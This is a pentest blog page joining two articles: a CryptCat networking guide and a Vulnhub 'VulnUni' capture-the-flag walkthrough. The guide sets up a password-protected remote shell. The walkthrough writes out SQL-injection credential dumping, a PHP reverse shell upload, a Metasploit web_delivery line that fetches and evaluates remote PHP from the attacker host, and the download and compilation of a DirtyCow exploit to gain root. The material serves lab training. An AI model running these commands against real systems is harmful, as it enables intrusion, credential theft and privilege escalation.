Comprehensive Guide on CryptCat

In this article, we will provide you with some basic functionality of CryptCat and how to get a session from it using this tool.

Table of Contents:

·         Introduction

·         Chat

·         Verbose mode

·         Protect with Password

·         Reverse Shell

·         Randomize port

·         Timeout and Delay interval

·         Netcat vs CryptCat

Introduction

CryptCat is a standard NetCat enhanced tool with two-way encryption. It is the simplest Unix utility tool, which reads and writes data across network connections. It can use TCP or UDP protocol while encrypting the data that is transmitted over the network. It is a reliable back-end tool that is easily driven by other programs and scripts. It is considered to be a network debugging and exploration tool.

CryptCat can act as a TCP/UDP client or server when connected to or when it acts as a listener to the socket. It can take a password and adds a salt to encrypt the data that is being sent over the connections. Without providing a specified password, it will take the default password i.e. “metallica”.

We can explore its working and usage by exploring its available options.

cryptcat -h

Chat

CryptCat can be use to chat between two users. We need to establish a stable connection prior to the chat. To do this, we need two systems out of these two systems one will be a listener and the other will be an initiator. So that communication can be done from both ends.

Here, we are trying to create a scenario of chat between two users with different operating systems.

User 1

OS: Kali Linux

IP Address: 192.168.0.107

Role: Listener

To initiate listener in Kali Linux, follow this command to create a listener:

cryptcat -l -p 42

User 2

OS: Ubuntu

IP Address: 192.168.0.108

Role: Initiator

To create an initiator, we will just provide the IP Address of the system where we started the listener followed by its port number.

cryptcat 192.168.0.107 42

Verbose mode

In CryptCat, verbose mode can be initiated by using the [-v] parameter. Now, verbose mode is made for generating extended information from our actions. We will try the above chatting mechanism with verbose mode. We can see that when we add [-v] to the CryptCat command it displays the information about the process that its performance while connecting.

At listener side

cryptcat -lvp 42

At Initiator side

cryptcat -v 192.168.0.107 42

Protect with password

In CryptCat, we can protect our connection of chatting with a password and password can be applied by using the [-k] parameter. We know that CryptCat provide us end to end encryption, but by using the [-k] parameter we can provide the extra layer of protection to our connection. So that it is almost impossible to decrypt our connection. We can apply this protection with the following commands.

At listener side, we apply [-k] parameter along with password.

cryptcat -k ignite -lvp 42

At the Initiator side, we need to apply the same password applied by the listener so that we can connect to some connection.

cryptcat -v -k ignite 192.168.0.107 42

Reverse shell

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine receives the connection through a port by providing a password. To activate the listener on the target machine for geting shell, use the following command:

cryptcat -k mysecret -l -p 3333 0myfifo

Now, at the attacker side, we just need to connect to the victim. Then we can authenticate our self as we got its root access or by the help of whoami command.

cryptcat -k mysecret 192.168.0.107 3333

whoami

ip a

Randomize port

If we cant decide our port number to start the listener or establish our CryptCat connection. Well then, CryptCat has a special [-r] parameter for us which gives us a randomize local port.

cryptcat -lv -r

Timeout and Delay interval

Most of us are confused between these terms. Timeout is supposed to be a time to complete our task or program. Where as the delay interval is the interval time between two individual requests or tasks. So in CryptCat, we have [-w] parameter for timeout and [-i] parameter for delay interval. To apply this two individual parameters to get our desired results.

At listener side, we apply both time out and the delay interval

cryptcat -v -w 30 -i 10 -l -p 8080

At the initiator, we are only applying timeout.

cryptcat -v -w 2 192.168.0.7 8080

Netcat vs Cryptcat

Well before comparing these two first, we need to know about the Netcat or nc. It is a utility tool use TCP and UDP connection to read and write in a network. It can used for both security and hacking purposes.

In the case of hacking, it can be used with the help of scripts which makes it quite dependable. And if we need to talk about security, it helps us to debug the network along with investing it. If we want to learn all the working of the Netcat. We have covered netcat in our previous article and to read that article click here.

And when it comes to CryptCat, it is a more advanced version of Netcat. It provides us the two-way encryption that makes our connection more secure. We are comparing these two amazing tools based on connection encryption of the chatting feature by intercepting their network interface with the help of Wireshark.

Netcat: as we know we apply a listener and an initiator to start this connection for chatting. Along with that, we initiated the Wireshark to intercept its network interface.

At the listener side we are using [-l] parameter for listening and [-p] parameter for port number.

nc -l -p 3131

At the Initiator side, we just need to provide a port number, along with the listeners IP Address.

nc 192.168.0.111 3131

Now, we have to check whether our Wireshark were able to catch something or not. As we can see that we successfully intercepted the network and see this network chat.

Cryptcat: In cryptcat, we already know that it provide us two-ways encryption. Which makes the connection network more secure that Netcat. But we need to check this as well by intercepting its chatting with the help of Wireshark. For that connection, we needed a listener and an initiator for connecting a connection.

At the Listener side, we will use the [-p] parameter for port and [-l] for initiating the listener.

cryptcat -l -p 3131

At the initiator side, we just need to provide IP Address along with listeners port number.

cryptcat 192.168.0.111 3131

Now check whether we can acquire anything or not. As we can see that this chat is in encrypted mode.

That is the main difference between the Netcat and the Cryptcat. One provides encryption in its network and the other is not. Some people might say that CryptCat = encryption + Netcat.

Author: Shubham Sharma is a Pentester, Cybersecurity Researcher, Contact Linkedin and twitter.

VulnUni: 1.0.1: Vulnhub Walkthrough

Hello! Everyone and Welcome to yet another CTF challenge from emaragkos, called ‘VulnUni: 1.0.1,’ which is available online on vulnhub for those who want to increase their skills in penetration testing and Black box testing. You can download the lab from here.

Level: Easy

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

·         Scanning

o   Netdiscover

o   Nmap

·         Enumeration

o   Browsing HTTP service

o   Extracting urls through burpsuite spider

·         Exploitation

o   Using sqlmap to exploit sql vulnerability   

o   Extracting User information using sqlmap

·         Privilege Escalation

o   Uploading php shell upload

o   Using msfconsole web delivery to get reverse shell

o   Using DirtyCow to exploit kernel version

·         Capturing the flag

Walkthrough

Let’s get started and pwn this machine!

Scanning

To identify our target, we will use netdiscover and our target IP is 192.168.1.148 as shown in the image below:

Let’s proceed further with Nmap to scan our target IP in order to find open ports, if any. Use the following command to scan the IP:

nmap -A 192.168.1.148

And as the result shows, port 80 is open with the service of HTTP.

Enumeration

As we are enumerating further, we open the target IP in the browser. The webpage that we came across was about the university.

We couldn’t find anything useful here so we moved on and we started a Directory Bruteforce in order to enumerate the machine further. This gave us some directories and files namely contact, about, courses etc. But apart from this there wasn’t anything useful here.

Then, I launched burpsuite and captured the request of the URL in the intercept tab as shown in the following image.

Further, through the spider feature od burpsuite, we were able to find many URLs. Out of these the E-Class URL was opened. Along with this, we also found the application version, i.e. 1.7.2, could be vulnerable and can be exploited. We made a note of this as it will be useful in further pwning of the lab.

The directory e-class got us a login form. When tried to log in with default username and password, i.e. admin:admin, we successfully logged in.

But after logging in there was a Document Expired error and the URL was redirecting to Vulnuni.local as shown in the image below :

Therefore, we added the host to our /etc/hosts file just like in the image below :

Earlier, we found that the application was using 1.7.2 version which is outdated. And after gathering open intelligence we found that the particular version of  vulnerable to the exploit which was available on exploit-db as shown in the image below :

In order to use the exploit to our advantage, we needed to capture the request of the login page through burpsuite as shown in the image below :

After capturing the request, copy it to a text file and save file and save it as shown in the following image:

Now, with the help of sqlmap we will inject our malicious query, with the help of the following command:

sqlmap -r vulnuni --dbs --batch

Executing the above command, lead us to find five databases in total, as shown in the image below, all we need now is to get credentials for anyone of the database.

As during the challenge, e-class directory proved to be of importance, we decided to get credentials of eclass first, hence the following command:

sqlmap -r vulnuni -D eclass -T user -C password --dump --batch

We found few passwords, as shown below, and tried to ne by one to log in.

And soon we were successfully logged in as the password is ilikecats89 which you can also observe in the image below :

Upon traversing, we found a link through which we can could upload our shell, the link is - http://vulnuni.local/vulnuni-eclass/modules/course_info/restore_course.php

In order to upload our malicious file, we first downloaded php reverse shell and changed IP and PORT to the local host and local port and the uploaded it’s compressed version. You will find similar in the image below :

After uploading shell, we started the netcat listener by using the following command:

sudo nc -nvlp 443

Once, the shell file is executed, we have our shell through netcat, as shown in the image below :

But as it is not the best working environment, we are continuing with Metasploit’s “web delivery” Module to transfer our netcat session into a meterpreter one which will further provide us more options. And for this, type:

use/exploit/multi/script/web_delivery

set target 1

set lhost 192.168.1.92

set payload php/meterpreter/reverse_tcp

set lport 80

exploit

Note: To get meterpreter shell we sent the php -d allow_url_fopen =true -r “eval(file_get_contents(‘http://192.168.1.92/Oyd1Yv5lI’));” in terminal above.

To upgrade the shell into TTY shell which is more powerful. For this conversion of shell use the following command:

python -c ‘import pty;pty.spawn("/bin/bash")’

After getting the TTY shell, we navigated through many directories and we found user flag in the home directory with the help of following commands:

cd /home

ls

cd vuluni

cat flag.txt

Privilege Escalation

We will use the following command to we get the kernel version of target machine.

uname -r

Then through OSINT we found that kernel was vulnerable to DirtyCow. Therefore, we downloaded the exploit to our local machine and saved it in /var/www/http and then started the apache server on port 80. Further we moved the dirtycow.c file to the /tmp directory of the target by using the following commands:

cd  /home

cd  /tmp

wget http://192.168.1.92/dirtycow.c

Now, compile the exploit’s c language file to executable binary file using the following command along with giving it permissions as following:

gcc dirtycow.c -0 root -pthread

./root

cd /root

ls

cat flag.txt

And voila!! We have successfully rooted the lab.